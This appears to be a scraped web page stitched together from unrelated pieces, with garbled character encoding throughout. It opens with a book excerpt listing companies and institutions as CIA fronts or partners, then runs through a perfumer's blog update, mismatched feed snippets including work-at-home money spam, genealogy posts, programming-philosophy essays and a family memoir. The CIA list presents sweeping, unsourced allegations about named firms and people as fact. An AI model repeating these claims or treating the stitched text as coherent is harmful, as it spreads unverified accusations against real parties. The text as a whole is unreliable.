As this book went to press, the smart phone game application PokÃ©mon Go fad was sweeping the planet. Unbeknownst to many of the on-line gameâs avid fanâs was the connection of the gameâs developers to the CIAâs venture capital firm IN-Q-TEL. All users saw their geo-location and other smart phone data being swept up by a CIA partner firm.
Amazon, Inc. [CIA contractor]. Company provides cloud computing services for the CIA. Amazonâs CEO Jeff Bezos also owns The Washington Post.
American Historical Society. [CIA partner]. Many society officials were OSS/CIA officers.
American Press Institute. [CIA front]. Operating out of Columbia University, the instituteâs director in the 1950s was a CIA officer.
AmeriCares. [CIA partner]. A non-profit organization that is often the âfirst inâ at refugee situations. Founded by tycoon J. Peter Grace, a board chairman of the CIA front, the American Institute for Free Labor Development (AIFLD) and a trustee of another CIA front, the American Committee for Liberation from Bolshevism, AmeriCares was involved in funding the Nicaraguan contras. The group has also provided the CIA with recruiting opportunities at mass refugee sites, particularly in Latin America and Asia.
Bechtel Corporation. [CIA contractor]. Bechtel is a large construction company that has included former CIA director Richard Helms, CIA pseudonym âFletcher M. Knight,â among its executive ranks. Bechtel was active in providing corporate cover for the OSS in the Middle East during World War II. Bechtel has been a consummate service company for various CIA operations, including support for the CIA-inspired coup against the Syrian government in 1949, the Iranian government of Prime Minister Mohamed Mossadeq in 1953, and President Sukarno of Indonesia in 1965. From the 1960s to the 1970s, Bechtel provided cover for CIA agents in Libya under both the regime of King Idris and his successor, Muammar Qaddafi. Sometimes called a âsecret armâ of the CIA, Bechtelâs executives included those who would join President Reaganâs Cabinet, including Secretary of State George Schultz and Secretary of Defense Caspar Weinberger.
Before World War II, Steve Bechtel formed a military-industrial complex partnership with John McCone. McCone later became the chairman of the Atomic Energy Commission and later, director of the CIA. The CIA has used Bechtel to provide cover for non-official cover CIA operatives abroad.
Blackstone Investment Group. [CIA front]. With offices in Washington, DC and Moscow, arranged for the purchase of KGB documents following the collapse of the Soviet Union. Among the documents sought by the front company were any related to illegal CIA activities during the Cold War, including the 1963 assassination of President John F. Kennedy.
Bourbon and Beefsteak Bar and Restaurant. [CIA front]. Opened in 1967 in Kingâs Cross in Sydney, Australia. Served as a rendezvous point for CIA, Australian Security Intelligence Organization (ASIO), and organized crime figures. Its proprietor was Bernie Houghton, a CIA operative with links to Nugan Hand Bank, CIA weapons smuggler Edwin Wilson, and CIA clandestine services officers Theodore Shackley, Rafael Quintero, and Thomas Clines.
Center for Democracy. [CIA front]. Administered under the aegis of Boston University, the center maintained offices in Boston, Washington, DC, Guatemala City, and Strasbourg, France. Involved in CIA operations in eastern Europe, Central America, and Africa.
Colt Patent Firearms Company. [CIA partner]. Based in Hartford, Connecticut, provided corporate cover for CIA officers operating abroad.
Daddario & Burns. [CIA partner]. Headed by former OSS officer Emilio Daddario, a Democratic Representative from Connecticut, the Hartford-based law firm provided services to the CIA.
DC Comics. [CIA partner]. Worked with the International Military Information Group (IMIG), a joint CIA/Pentagon unit at the State Department, to disseminate propaganda comic books, featuring Superman, Batman, and Wonder Woman, in Serbo-Croatian and Albanian, to youth in the Balkans during the military conflicts in that region.
Disney Corporation. [CIA partner]. CIA agents who were adept at creating front companies and shell corporations in Florida, worked closely with Disney in preparation for the construction of Disney World near Orlando, Florida. OSS veteran âWild Billâ Donovan and CIA shell company expert Paul Helliwell helped create two fake Florida cities, Bay Lake and Lake Buena Vista, as well as a number of shell corporations, to keep secret the plans for Disney World. This kept land prices low because real estate speculators were unaware of the prospective value of the land in a desolate area of central Florida.
Emory School of Medicine. [CIA partner]. Located in Atlanta, Georgia. Involved in the CIAâs MK-ULTRA behavioral modification project.
Enron Corporation [CIA partner]. Houston-based firm that was used by the CIA to provide commercial cover for its agents around the world. There were at least 20 CIA employees on Enronâs payroll. Andre Le Gallo, a former official of the CIAâs Operations Directorate, went to work as a corporate intelligence officer for Enron.
Fair Play for Cuba Committee (FPCC). [CIA front]. Officially established by American Trotskyists, the group was penetrated by CIA operatives. The FPCC New Orleans office was a CIA front that provided cover for the anti-Fidel Castro activities of Lee Harvey Oswald, Clay Shaw, and David Ferrie, among others. The New Orleans FPCC office was located at 544 Camp Street and shared the same building entrance with Guy Banister Associates, Inc., a private detective agency, the address for which was 531 Lafayette Street and around the corner from 544 Camp Street.
In December 1963, after the assassination of President John F. Kennedy, the FPCC ceased all U.S. operations.
General Electric Company. [CIA partner]. Based in Fairfield, Connecticut, provided corporate cover for CIA officers operating abroad.
General Foods Corporation. [CIA partner]. Advertising account at CIAâs Robert Mullen Company handled by an active CIA employee.
Google, Inc. [CIA partner]. Developed as a result of a research grant by the CIA and Pentagon to Stanford Universityâs Department of Computer Science. The CIA referred to the research as the âgoogle project.â
Greenberg Traurig. [CIA partner]. Washington, DC âconnectedâ law firm.
Guy Banister Associates, Inc. [CIA partner]. New Orleans private detective agency headed by former FBI agent Guy Banister. The detective agency coordinated the activities of various anti-Castro Cuban groups in New Orleans, including Banisterâs own Anti-Communist League of the Caribbean, as well as the Cuban Revolutionary Council, the Cuban Democratic Revolutionary Front, Friends of Democratic Cuba, and the Crusade to Free Cuba Committee.
Banister and Associates shared office space with the CIAâs New Orleans front, the Fair Play for Cuba Committee, headed by Lee Harvey Oswald.
Hale and Dorr. [CIA partner]. Boston-based law firm that provided cover for CIAâs Independence and Brown Foundations.
Halliburton. [CIA contractor]. Based in Houston, it is the worldâs largest oil service company. Recipient of a number of CIA sole-source contracts for services worldwide.
Harper and Row, Inc. [CIA partner]. Manuscripts submitted to the New York publisher that dealt with intelligence matters, particularly CIA operations, were turned over to the CIA for censoring edits before publication.
Hewlett Packard Corporation. [CIA partner]. Sold computers to Iraq for Saddam Husseinâs missile program with the knowledge and approval of the CIA.
Hill & Knowlton. [CIA partner]. Public relations firm that teamed with the CIA on a number of operations. Hill & Knowltonâs numerous offices abroad provided cover for CIA agents. One known Hill & Knowlton office that was a CIA front operation was in Kuala Lumpur.
Kerr-McGee. [CIA partner]. Provided corporate cover for CIA officers operating overseas.
Kissinger Associates, Inc. [CIA partner]. New York-based international consulting firm founded by former Secretary of State and National Security Adviser Henry Kissinger. Former National Security Adviser Brent Scowcroft is a co-owner. The firm provided support to the CIA-linked American Ditchley Foundation and the Bilderberg Group. Much of the 1982 seed money for Kissinger Associates was provided by Goldman Sachs.
Knight Foundation. [CIA partner]. Also known as the John S. and James L. Knight Foundation. Based in Miami, the foundation provides funding for various CIA-connected media operations in the United States and around the world.
Kroll Inc. [CIA partner]. Founded in 1972 by Jules Kroll, who had links to both U.S. and Israeli intelligence. Based in Manhattan. French domestic law enforcement believed Krollâs Paris office was a CIA front. Kroll handled the security for the World Trade Center after the 1993 terrorist bombing and continued to be responsible for security up to, during, and after the September 11, 2001 terrorist attack. Kroll employed former FBI assistant director for counter-terrorism John OâNeill, who died in the collapse of the World Trade Center.
Lincoln Savings and Loan. [CIA partner]. Based in Irvine, California and headed by notorious swindler Charles Keating, Jr., involved in laundering funds for the Iran-contra scandal.
Lone Star Cement Corporation. [CIA partner]. Based in Stamford, Connecticut and linked to the Bush family, provided corporate cover for CIA officers operating abroad. Involved in the Iran-contra scandal.
Mary Carter Paint Company. [CIA front]. A money-laundering operation for the CIA. Involved in casinos in the Bahamas.
Monsanto. [CIA partner]. The firm contracted with former CIA official Cofer Blackâs Total Intelligence Solutions (TIS), a subsidiary of the CIA-connected Blackwater USA, later Xe Services, to monitor animal rights groups, anti-genetically modified (GM) food activists, and other groups opposed to Monsantoâs agri-business operations worldwide.
National Enquirer. [CIA partner]. The tabloidâs founder, Generoso (Gene) Pope, Jr., worked for the CIAâs psychological warfare unit and the agencyâs Italy branch in 1950. In 1952, Pope acquired The New York Enquirer broadsheet and transformed it into a tabloid, renaming it The National Enquirer. This transformation bore the imprimatur of the CIAâs Operation MOCKINGBIRD media influence program.
Newsweek. [CIA partner]. Magazine reporters and stringers fed information to the CIA. Newsweekâs stringers in southeastern Europe and the Far East were CIA agents. When Newsweek was bought by The Washington Post Company in 1961, cooperation between the magazine and the CIA increased. It was a participant in the CIAâs Operation MOCKINGBIRD media influence program. Much of the staff of Newsweek was absorbed into a new online publication, The Daily Beast, which continues to disseminate CIA-influenced articles. See Washington Post.
Nieman Foundation. [CIA partner]. Located at Harvard University, the foundation awarded Nieman Fellowships, some on behalf of the CIA, for foreign journalists to study at Harvard. The journalists were subjected to CIA recruitment efforts prior to their returning to their home countries.
Pamela Martin & Associates. [CIA partner], Escort firm run by Deborah Jeane Palfrey, the so-called âDC Madam.â During her 2008 trial for mail fraud, Palfrey attempted to invoke the Classified Information Procedures Act in order to discuss her relationship with the CIA. The U.S. Court refused Palfreyâs request and she was convicted and later said to have committed suicide before her sentencing hearing in Washington, DC. One of her clients was Randall Tobias, the head of the CIA-connected USAID. Another was Louisiana Republican senator David Vitter.
Paris Review. [CIA front]. Literary magazine edited by George Plimpton. Published works by Jack Kerouac and Samuel Beckett. The magazineâs co-founder, Peter Matthiessen, relied on his affiliation with the magazine as his CIA cover.
Quaker Oats Company. [CIA partner]. Worked with the CIA and Atomic Energy Commission to place trace amounts of radiation in breakfast cereal served to boys at the Fernald School for the mentally retarded in Waltham, Massachusetts.
Radio Corporation of America. [CIA partner]. Provided corporate cover for CIA officers operating abroad, particularly in Iran, Philippines, Japan, and West Germany. Provided technical assistance to CIA-financed clandestine and propaganda radio stations worldwide, including Radio Free Europe. RCA founder David Sarnoff was a major supporter of CIA operations, including propaganda dissemination around the world. RCA chairman and chief executive officer Thornton F. Bradshaw was active in the operations of the CIA-linked American Ditchley Foundation.
Reily Coffee Company. [CIA partner]. Also known as William B. Reily Coffee Company and based in New Orleans, this company employed Lee Harvey Oswald and a number of other U.S. government employees, many of whom were suspected CIA officers.
Robert M. Mullen Company. [CIA proprietary]. A Washington, DC public relations firm, it was used as a front for CIA activities. E. Howard Hunt, the CIA agent, worked for Robert Mullen when he was arrested in the break-in of the Democratic National Committee headquarters at the Watergate Hotel in Washington in 1972. The Senate Watergate Committee reported that âthe Mullen and Company has maintained a relationship with the Central Intelligence Agency since its incorporation in 1959. It provided covers for agents in Europe (Stockholm), Latin America (Mexico City), and the Far East (Singapore) at the time of the Watergate break-in.â
Rockefeller Foundation. [CIA partner]. Used by the CIA to direct scholarships and grants to the Third World and Eastern Europe. Rockefeller Foundation money was funneled to the American Committee for a United Europe (ACUE), created in 1948. The chairman of ACUE was OSS chief William J. Donovan and the vice chairman was Allen Dulles. One of ACUEâs board members was Walter Bedell Smith, the first CIA director.
Summa Corporation. [CIA partner]. Owned by Howard Hughes, Summa is believed to have skimmed gambling profits from the Sands, Desert Inn, Frontier, Silver Slipper, Castaways, and Landmark casinos in Las Vegas and Haroldâs Club in Reno for the CIA and the Mafia. Provided financial cover for the CIAâs Glomar Explorer project.
Teneo Intelligence. [CIA partner]. Branch of Teneo Holdings, which is headquartered in New York. Teneo Holdingsâs intelligence branch includes former CIA officials. Teneo is closely linked to former President Bill Clinton and Hillary Clinton. Teneo Intelligence has offices in New York, London, Rome, Brussels, Dubai, Bogota, New Delhi, and Tokyo.
Texas Commerce Bank (TCB). [CIA partner]. Houston-based bank founded by the family of James Baker III. Texas Commerce Bank was used to provide commercial cover for CIA agents. After serving as vice president for Texas Commerce Bank in Caracas from 1977 to 1979, Jeb Bush joined his fatherâs presidential campaign in 1980. Serving with Bush on the campaign was Robert Gambino, the CIA deputy director of security who gave Bush his orientation brief at Langley in 1977.
Kenneth Lay, the chairman of Enron, which had its own links to the CIA, served on the board of Texas Commerce Bank. Texas Commerce Bank was acquired by Chemical Bank in 1987.
The bank provided major loans to Howard Hughesâs Summa Corporation. See Summa Corporation.
United Fruit Company [CIA partner]. Involved in 1954 CIA overthrow of Jacobo Arbenz government in Guatemala. Published the Latin America Report, a publication that was a CIA front used for clandestine activities. The CIA transferred weapons to United Fruit employees in Guatemala who were involved in undermining the Arbenz government. The joint CIA-United Fruit plan was code named OPERATION FORTUNE. Company provided an airfield in Guatemala for the CIAâs training of Cuban exiles for the Bay of Pigs invasion of Cuba.
U.S. Rubber Company. [CIA partner]. Headquartered in Naugatuck, Connecticut and later called Uniroyal, provided corporate cover to CIA officers operating abroad. Included those operating under the cover of the Dominion Rubber Company of Canada, a subsidiary of U.S. Rubber Company.
U.S. Youth Council (USYC). [CIA front]. Founded in 1945 and based in New York. Some 90 percent of its funds came from the CIA. USYC received funding from the Foundation for Youth and Student Affairs (FYSA), a CIA front. The USYC was composed of American Youth Hostels, Camp Fire Girls, 4-H, American Unitarian Youth, National Catholic Welfare Conference, National Students Assembly, YMCA and YWCA.
Wackenhut. [CIA contractor]. Wackenhut, a Palm Beach Gardens, Florida-based security firm, stood accused of providing the CIA with specialized services around the world, including Chile, Greece, and El Salvador. Its Venezuelan branch, Wackenhut Venezolana, C.A., was accused in 2002 of involvement in the CIAâs coup against President Hugo Chavez. William Casey served as Wackenhutâs outside counsel before becoming CIA director in 1981.
Wackenhut eventually merged into the global security firm G4S.
Washington Post. [CIA partner]. The Washington Post was part of the CIAâs Operation MOCKINGBIRD, the agencyâs media influence project. Post publisher Phil Graham was a close friend and associate of MOCKINGBIRD chief Frank Wisner, Sr. and CIA director Allen Dulles. Wisner assisted Graham in acquiring The Washington Times-Herald and WTOP radio, creating a sizable CIA-influenced media operation in the nationâs capital.
W. R. Grace. [CIA partner]. Provided corporate cover to CIA officers operating abroad, particularly in Latin America. Provided donations to CIA front foundations.
Do not mistake my lack of posting for lack of action. It's been quite the opposite - the most action-packed few months of my life. Here is what I've accomplished - to put your minds at ease and satisfy any curiosity that might have remained among those of you who haven't given up on SmellyBlog yet:
- Designed, planned agonized over and built a new Perfume studio, Pilates studio - and renovated my old home) while making new friends with the builders and architects involved
- Lived in a yurt for 4 months (November through March) while I was at it - and also found myself adopting a cat of all creatures (not intentional, but seems to work out)
- Transitioned my daughter into a Hebrew-speaking high school for another two years of education
- Moved from the yurt to the house
- Adopted a rescued female Doberman (that was a dream come true)
- Taught two Perfumery Courses back to back: Fougere and Orientals (while meeting with Dan Riegler - a Canadian- Israeli from Ontario who gifted me with the most incredible incense resins imaginable - more on that in a separate post
- Became auntie to one more niece and nephew (that was quite effortless!)
- Continue to try and establish my perfumery studio (and Pilates studio) in the new surroundings
- Try my best to be with my grandma, who's 93 years young and had a heart event about a month ago. Every moment with her is so pure and precious.
- Planning and beginning to plant my Perfumer's Botanical Garden, which is truly taking much of my time and is the main reason I haven't been blogging. The photo above is from the section of it that is on the mountain and is dedicated to fragrant Mediterranean plans and medicine herbs.
I spend very little time around the computer (after months of wifi & electricity-free yurt life and bad battery in my laptop - old habits have been broken to little shreds and I only post quick updates via my phone on my Facebook, Instagram and Twitter accounts)
Hopefully I've gotten to the point when I'm settled down to return to regular blogging - as demanding as life has been all these months, I know deep in my heart that it does do me good to write regularly. It's not just a fragrance/perfumery blog, but also functions as a personal journal to me.
|As the Conceptual Age fades the Meaning Age rises||For years, we filled our brains and the mouths of the transaction between the information age - the era of computerization - and the conceptual age in the hope that this could save western economies from the ultimate nightmare of globalization of work and offshoring. We believed that thanks to our supposed greater ability to design great products, experiences and eventually statuses, we may have succeeded to the threat.
The news is that this is not happening.
|Chrome OS: from Personal Computer to Personal Computing. A matter of trust.||Google is gradually shifting the user ownership from hardware computers to computing sessions hosted on it's infrastructure. Are you ready for the shift?|
|Schlecht notiert ist halb vergessen: So behÃ¤ltst du die Ãbersicht|
Es gibt viele Feinde eines erfolgreichen Zeitmanagements. Einer der grÃ¶Ãten ist sicherlich, die Ãbersicht zu verlieren oder sich zu verzetteln.
Das gilt besonders fÃ¼r Notizen. WÃ¤hrend der Sitzung macht man sich Notizen auf Papier, das Telefonat hÃ¤lt man am Computer fest und die Ergebnisse aus dem GesprÃ¤ch mit dem Kunden sind nur im Kopf. Ach ja, und ein paar Dinge stehen im Smartphone, da das gerade so schÃ¶n verfÃ¼gbar war.
So gehen gute Ideen verloren und die Gefahr ist riesig, Aufgaben zu vergessen.
Diese Frage wage ich nicht mal, mir selbst zu stellen.
FrÃ¼her war ich da sehr chaotisch. Auch in meinen Coachings ist dieses Thema ein Dauerbrenner.
Doch jetzt als ProduktivitÃ¤tstrainer weiÃ ich, wieâs geht.
Die Shownotes findest du unterÂ https://ivanblatter.com/notizen-machen/
|#044: So erstellen Sie einen Notfallplan||
So erstellen Sie einen Notfallplan
Den Podcast abonnieren
|Computer Makers Making a Shift to Colored Laptops||It’s hard to imagine a world without computers now that they have become so popular. One remembers when computers used to be the sole domain of offices and large corporations who could afford their lofty maintenance costs. In the last 50 years, computers have revolutionized the way we work and conduct business. Learning has also […]|
|Get Your Pink Laptop Today||Personal computers, otherwise known as PCs, have been in existence now for the last two and half decades and have revolutionized the way people work and share information. This is a long cry from when computers used to occupy three or four story buildings because of their bulky size. They also used to be predominantly […]|
|Generate Money Online||Generate Money Online - Learn how to use your
computer to generate money online, find opportunities ways to generate money online from home with a website...|
|Dean Koontz's "Moonlight": how a commercially prolific suspense novelist remains relevant as technology and politics change|
During my first year of employment at USLICO in Arlington in 1990 (what would become my last main job, for 12 years and four owners), I read the Dean Koontz 1989 novel âMidnightâ, and shared it (paper, Putnam was original publisher) with a few people in production control in what would become a coffee break book club.
The novel is remarkable in its huge number of chapters, and organization into three parts each with its own chapter 1.
The novel starts with a jogger running in a California beach town (Moonlight Cove -- âIn the Moonlight, Do Meâ indeed) being attacked by a mysterious alien-like creature, and soon the mystery, somewhat in a âTwin Peaksâ -like fashion, is examined from the viewpoint of various characters, whose narratives gradually connect. (Irving Wallace had used this technique for building plots for Cold War spy novels back in the 1960s). It seems as though people are getting converted into hybrid creatures and that a sociopathic computer scientist Shaddock is involved.
I would have thought that this novel would make a good miniseries on a cable channel,, even today, as the premise has less dependence on political circumstances and even technology than most sci-fi suspense novels. Koontz sometimes gets into Shaddackâs head, anticipating the psyche of a modern terrorist, deflecting the social issues (like gay rights in one passage) in surprising ways.
I mention the novel because Koontz is often heralded in some circles as the ideal author who writes strictly to sell, and he indeed has a huge career of a long list of novels, divided into various subcategories of suspense. Literary agents love his approach, because it is so commercial. So do trade publishers.
One problem with developing suspense novels is that sometimes they become very vulnerable to changes in world politics, which can come suddenly and be largely unexpected by suspense authors, like the fall of the Soviet Union at the end of 1991. Today itâs not clear who is the biggest threat: North Korea, Iran, ISIS, Russia, China.
Iâve had that problem, and my own approach to fiction has to start with my own narrative first. I make no apologies, despite the disruptive advice and sales calls from others.
|Cyber Security for the Small Business|
Cyber Security Month October is Cyber Security Month. If your company uses any kind of computers, cell phones, networks, software, etc. to go about its business, then this month applies to what you do day in and day out. Having these technologies makes our lives more advanced and efficient but they also leave us open […]
Mencari semua teman di Yahoo! Messenger?
Undang teman dari Hotmail, Gmail ke Yahoo! Messenger dengan mudah sekarang!
|Work At Home Earn Upto $10000 Working At Home||Work At home online, learn the exact data entry system an unemployed dad went from nothing to 10,000 per month working online from his computer. Visit Website... Get Started Now...|
|Acer Chromebook 14 CP5-471 schematic â Acer ZDA M/B schematic||The motherboard schematic for Acer Chromebook 14 CP5-471Â laptop/notebook, Â Quanta ZDAÂ Mainboard CPU:Â SKY LAKE ULTÂ Integrated PCHÂ + LPDDRIII OEM:Quanta Computer Inc. Document Number:Â ZDA Rev:Â 8A Format: PDF Total Pages: 43 File size: 1.19 MB Price: $10.5 Block Diagram:|
|Acer Chromebook R13 CB5-312T schematic â Acer ZSE M/B schematic||The motherboard schematic for Acer Chromebook R13 CB5-312TÂ laptop/notebook, Â Quanta ZSEÂ Mainboard CPU:Â Mediatek MT8173Â Â + LPDDR3-800 OEM:Quanta Computer Inc. PROJECT:Â ZSE Rev:Â 1A Format: PDF Total Pages: 29 File size: 926 KB Price: $10.5 Block Diagram:|
|Sony SVF15 schematic â DA0HK9MB6D0 â Sony HKC M/B schematic||The motherboard schematic forÂ Sony SVF15 SeriesÂ Â laptop/notebookÂ Quanta HK9/HKCÂ Mainboard CPU: Intel Shark BayÂ Haswell ULT +Â Lynx Point-LPÂ + DDR3L + Nvidia N14P-GV2 OEM:Quanta Computer Inc. PROJECT: HKC Rev:Â 1A Format: PDF Total Pages: 40 File size: 984 KB Price: $10.5 Block Diagram:|
|5.7.5|| updated on 19-03-2010 CDT - The computer program "the school Certificate" represents the computer module of filling of...|
|2011 4.5.83|| updated on 01-10-2012 CDT - The computer program Diploma-standard NPO 2011 for the press of title pages and appendices to diplom...|
|Comment on Say Yes to the Dress by Becky||Dear Carly,
I appreciate so much your desire and willingness to donate a wedding gown to the Womenâs Recycle Center. Your dress will help them to come even closer to the goal of self-sufficiency.
You will not find them on the web as they do not have computers or have many people who can speak English in this impoverished country. There are a few Heavenâs Family ministry directors who make this trip yearly and we will bring the gowns with us and hand deliver them.
Our beloved contact, Simeon Muhunga, has been working tirelessly to help over 100 abused women for several years. It is a dream he has had for a long time and it is very slowly coming to pass, and many thanks to you and others, who have a heart of compassion for them.
The way to get the gowns to us is to mail them to: Heavenâs Family P.O. Box 12854, Pittsburgh, PA 15241
May the Lord richly bless you for your compassion upon the women in DR Congo and their families.
|Five Ways to Have the Best-Ever Virtual Genealogy Conference!||Can you believe how fast summer is sailing by? Which means the Family
Tree University Virtual Genealogy Conference is right around the corner, Sept.
13 to 15.
This online event has the excitement and shared knowledge of a genealogy conference, without the expense and difficulty of travel and being away from family and work. Or the pressure to change out of your fuzzy slippers.
Wikimedia commons, Ch2410
You get a weekend of video classes (which you can download to keep), networking with genealogy researchers and experts via our conference message boards, and a live keynote. Classes and Q&A sessions cover genetic genealogy, websites, methodology, organizing and preserving your research, and ethnic research.
I hope you'll join me there. Use coupon code FALLVCEARLY to save $40 on registration! (Code expires Aug. 11, 2017.)
As a seasoned Virtual Conference attendee, I've got a few tips for making the most of the experience:
1. Peruse the program ahead of time.
Most of the conference is on-demandâyou log in to watch videos and post to the message board any time during the conference. But Lisa Louise Cooke's keynote presentation on Sunday, "Big Pictures in Little Details," is live, as are the expert Q&A sessions on the message boards. Mark the scheduled bits on your calendar (remember the Virtual Conference is on East Coast Time).
Since you can download the classes to watch again, don't worry if you can't squeeze them all into the weekend. But do try to watch the ones most related to your research during the conference so you can discuss them on the message boards.
2. Free up some time.
The time-saving convenience of attending from home is a MAJOR draw. But carve out some time over the weekend to watch the videos and chat on the message boards. The Virtual Conference genealogy inspiration gets me excited about trying new strategies and resources, so I usually want to spend some time researching, too.
I minimize errands that weekend, and declare a pizza night for the kids. Daddy does something fun with them and we grant them more screen time. Therefore, my children enjoy the Virtual Conference almost as much as I do!
3. Log in on Friday.
Even if you're not planning on doing much conferencing on Friday, take 15 minutes to log in, go over the orientation and click around the conference. Make sure you can download a video. If you have any problems accessing the conference content, just post to the Technical Issues board and we'll address it as quickly as possible.
4. Play along.
You'll get the most benefit out of the classes and opportunities to interact with others if your research is fresh in your mind. Go over your tree before the conference to refamiliarize yourself with difficult ancestors. Make a list of your surnames and places for the surnames message board.
A lot of action happens on those boards! Introductions are made, tips shared, questions answered, brick walls solved, books and websites recommended. We'll even exchange recipes and family stories. Check here often during the conference, post your questions, and answer other peoples'.
5. Get comfy.
Everyone talks about how great it is to do genealogy in your pajamas. NOW'S YOUR CHANCE!! Wear your comfiest PJs and fuzziest slippers. Don't bother doing your hair. Make some coffee or tea, fetch your favorite snack and pad over to your computer. Revel in it.
Visit FamilyTreeUniversity.com to check out the conference details and sign up today. Remember to save $40 (before Aug. 11) with coupon code FALLVCEARLY!
|How I Created a Genealogy Timeline To Show My Grandfather's Life|| My grandfather Joe moved around a lot during his lifetime: Texas,
North Carolina, Louisiana, Mississippi, back to Texas, elsewhere in
Texas, Ohio, more places in Texas, various Ohio cities, South
Dakota, Ohio again. |
Timelines organize an ancestor's or a family's family tree dataâdates, places of residence, jobs, historical events, children's birthsâin an orderly fashion. I love them.
So when I was making a photo book about my grandfather as a Christmas present for my dad, I thought a timeline was just the thing to help summarize all those migrations. Matching up the timeline with a map of all the places would be even better.
My Grandfather's Migration Timeline
Here's the timeline and map I came up with:
The right-hand page lists each place Joe lived, with dates and details about what he did in that place. The information comes from my research in censuses, city directories, newspapers and other genealogy records. I'm lucky to have copies of a job application my grandpa filled out with his work history.
Looking at it now, I can see some things I'd change. But overall, I'm pleased with it.
For the map, I first tried customizing a Google map using free numbered place markers downloaded from here (Google's marker options don't include numbers). To create your own Google maps timeline, add a generic place marker to the map, click the paint can to edit the marker style, choose More Icons, then Custom Icon, and select the marker image file from your computer. You'll need a Google account to save the map.
I didn't love the result for my photo book, though, so I imported a map image into desktop publishing software I have access to through work, and added numbered place markers I created myself. Then I exported the file as a JPG to use in the photo book.
I know a few tricks, but I'm not a graphic designer, so there's probably an easier and more artful way to go about making the map.
Using Timelines in Your Genealogy Research
Timelines are among your best genealogy tools. In addition to helping you easily share genealogical information, they let you:
It'll show you how to use timelines to understand your ancestors' lives and solve research problems, and how to create a timeline by hand or using websites such as Twile and Treelines. Best of all, you can take this independent study course at your own pace and download the videos and research guides to keep.
See all the details for our Using Timelines in Your Genealogy course and register at FamilyTreeUniversity.com.
|Button - Wood Button - Giant Wood Button by ColdCreekBrewing|
A GIANT Button, made by Ryan, of course! :)
|The Queen of Manipulation|
This is Bella one of my rescue Shelties. I think she is trying to tell me itâs time to get off of the computer!? Not very subtle is she, Michael? :))
|Computer Equipment CAN be useful!|
I can’t imagine it was comfortable, but maybe it was warm?Maybe Cody just wanted to be near you Sue.Â :)
|PC foot warmer|
Little Lady likes to nap where she can be ready to help mom on the computer. Thanks to Kristin!
|A US firm is microchipping staff â hereâs what they should fear||Sure, an electronic implant will do away with troublesome security cards and forgotten computer passwords, but beware the hidden downsides, saysÂ Jamais Cascio|
|The mythology of programming language ideas|
If you read a about the history of science, you will no doubt be astonished by some of the amazing theories that people used to believe. I recently finished reading The Invention of Science by David Wootton, which documents many of them (and is well worth reading, not just because of this!) For example, did you know that if you put garlic on a magnet, the magnet will stop working? Fortunately, you can recover the magnet by smearing goats blood on it. Giambattista della Porta tested this and concluded that it was false, but Alexander Ross argued that our garlic is perhaps not so vigorous as those of ancient Greeks.
You can just laugh at these stories, but they can serve as interesting lessons for any scientist. The lesson, however, is not the obvious one. Academics will sometimes read those stories and use them to argue against something they do not consider scientific - arguing that it is like believing that garlic break magnets.
This is not how the analogy works. What is amazing about the old stories is that the conclusions that now seem funny often had very solid reasoning behind them. If you believed in the basic assumption of the time, then you could reach the same conclusions by following fairly sound reasoning principles. In other words, the amazing theories were scientific and entirely reasonable. The lesson is that what seems a completely reasonable idea now, may turn out to be wrong and quite hilarious in retrospect.
In this article, I will look at a couple of amazing theories that people believed in the past and I will explain why they were reasonable given the way of thinking of the time. Along the way, I will explore some of the ways of thinking that we use today about programming and computer science and why they might appear silly in the future.
|Philosophical questions about programming|
Combining philosophy and computer science might appear a bit odd. The disciplines have very little overlap. Both philosophers and computer scientists get taught formal logic at some point in their undergraduate courses, but that's probably as close as they get.
But the fact that the disciplines do not overlap much might very well be the reason why putting them together is interesting. In an article about Design and Science, Joichi Ito (from MIT Media Lab), describes the term antidisciplinary and nicely summarizes why looking at such unusual combinations is worthwhile:
As you can see from some of my earlier blog posts, I think the space between philosophy and computer science is an interesting area. In this article, I'll explain why. Unlike some of the previous posts (about miscomputation, types and philosophy of science), this post is quite broad and does not go into much detail.
At the danger of sounding like a collection of random rants, I look at a number of questions that arise when you look at computer science from the philosophical perspective, but I won't attempt to answer them. You can see this article as a research proposal too - and I hope to write more about some of the questions in the future. I wish antidisciplinary work was more common and I believe looking into such questions could have the tremendous impact that Joichi Ito mentioned.
|Philosophy of science books every computer scientist should read|
When I tell my fellow computer scientists or software developers that I'm interested in philosophy of science, they first look a bit confused, then we have a really interesting discussion about it and then they ask me for some interesting books they could read about it. Given that Christmas is just around the corner and some of the readers might still be looking for a good present to get, I thought that now is the perfect time to turn my answer into a blog post!
So, what is philosophy of science about? In summary, it is about trying to better understand science. I'll keep using the word science here, but I think engineering would work equally well. As someone who recently spent a couple of years doing a PhD on programming language theory, I find this extremely important for computer science (and programming). How can we make better programming languages if we do not know what better means? And what do we mean when we talk about very basic concepts like types or programming errors?
Reading about philosophy of science inspired me to write a couple of essays on some of the topics above including What can programming language research learn from the philosophy of science? and two essays that discuss the nature of types in programming languages and also the nature of errors and miscomputations. This blog post lists some of the interesting books that I've read and that influenced my thinking (not just) when writing the aforementioned essays.
|Miscomputation: Learning to live with errors|
Anybody who has something to do with modern computers will agree that the above statement made by Charles Babbage about the analytical engine is understatement, to say the least.
Computer programs do not always work as expected. There is a complex taxonomy of errors or miscomputations. The taxonomy of possible errors is itself interesting. Syntax errors like missing semicolons are quite obvious and are easy to catch. Logical errors are harder to find, but at least we know that something went wrong. For example, our algorithm does not correctly sort some lists. There are also issues that may or may not be actual errors. For example an algorithm in online store might suggest slightly suspicious products. Finally, we also have concurrency errors that happen very rarely in some very specific scenario.
If Babbage was right, we would just try three or four simple cases and eradicate all errors from our programs, but eliminating errors is not so easy. In retrospect, it is quite interesting to see how long it took early computer engineers to realise that coding (i.e. translating mathematical algorithm to program code) errors are a problem:
We mostly got rid of hardware faults, but coding errors are still here. Programmers spent over 50 years finding different practical strategies for dealing with them. In this blog post, I want to look at four of the strategies. Quite curiously, there is a very wide range.
|How I found my brother - Part 1|
I said I would tell you about how we found our brother and here it is - true to my word. How my brother found us (Part 2) will follow soon.
One Friday evening in February 2013, my OH and I were on our way to Kettering to meet up with my brothers. We were stopping at the eldest brother's to pick him up and then go on to the the youngest brother's for a drink and a catch up. My mum and eldest brother had moved to Kettering from London in 1999, and my youngest brother moved to Kettering in 2006. My mum died in 2009 and my dad died, aged only 47, in 1980.
When we got to the eldest brother's house he told me that someone had come to the door earlier in the day; spoken to him and had left him a card. He said the person - a man - said that he used to work with my mum. This immediately rang alarm bells because I knew my mum had for most of her working life, worked predominantly with women.
